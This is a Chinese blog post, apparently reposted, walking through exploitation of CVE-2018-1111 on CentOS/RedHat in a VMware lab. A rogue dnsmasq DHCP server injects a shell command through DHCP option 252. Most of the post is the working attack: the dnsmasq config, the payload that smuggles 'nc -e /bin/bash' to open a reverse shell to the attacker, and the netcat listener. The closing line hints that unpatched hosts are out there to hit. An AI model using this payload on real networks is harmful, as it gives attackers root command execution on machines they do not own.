• CVE-2018-1111 劫持dhcp造成Redhat、centos代码执行


    原文地址:https://www.o2oxy.cn/975.html

    前言: 看到crazy 老哥说有一个好新的漏洞。可以在redhat 和centos 执行任意代码 、 我说这就很有意思了。晚上来看看

    他分享了一下他写的博客。看了下。进入tools 看了下这个文章,仔细的看了下, 很有意思。有意思

    漏洞概述
    通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。

    影响:

    测试了一下 centos6 和centos7 都受到这个影响

    利用的整个过程:

    宿主机环境:Windows 10 企业版  
    虚拟机环境:VMware Workstation

    攻击者:Kali linux
    受害者:centos7

    • 1. 两台虚拟机的网络适配器都需要设置为 仅主机模式
    • 2. 停用主机模式的DHCP服务

    首先将两个虚拟机设置成仅主机模式,关闭dhcp功能。

    kali设置成静态地址,要和下文中的conf中的地址相同,网关也是本机ip。这里我设置成192.168.71.5

    root@kali:~# route add default gw 192.168.71.5

    kali创建个dnsmasp.conf内容如下:

    bind-interfaces 
    interface=eth0 
    except-interface=lo 
    dhcp-range=192.168.75.10,192.168.75.20,12h 
    dhcp-option=3,192.168.71.5
    dhcp-option=6,192.168.71.5
    log-queries 
    log-facility=/var/log/dnsmasq.log

     开启dnsmasp:

    dnsmasq -dC dnsmasq.conf --dhcp-option="252,malayke'&nc -e /bin/bash 192.168.71.5 6666 #"

    nc侦听6666端口

    nc -l -p 6666 -v

    kali 这边已经完成了

    现在centos重启一下网卡!

     

    已经显示获取到了IP 了 看看kali 这边的情况吧

     

     写了一个文件。在centos 里面查看一下

    总结:

    漏洞原理应该是使用了单引号导致了参数被执行。

    **--dhcp-option="252,malayke'&nc -e /bin/bash 192.168.182.130 6666 #"**

    现在应该还有很多主机是没有补丁的。。可以去 …. hhhhhhh

  • 相关阅读:
    名词解释
    cwoa2011项目部署到tomcat服务器(环境搭建及项目的运行)
    上网过程与原理
    C-编译器的实现
    css
    HMTL
    FIRST DAY
    关于面试的吐槽
    我的老大去创业啦
    .Net Core下使用 RSA
  • 原文地址:https://www.cnblogs.com/liang2580/p/9058227.html
Copyright © 2020-2023  润新知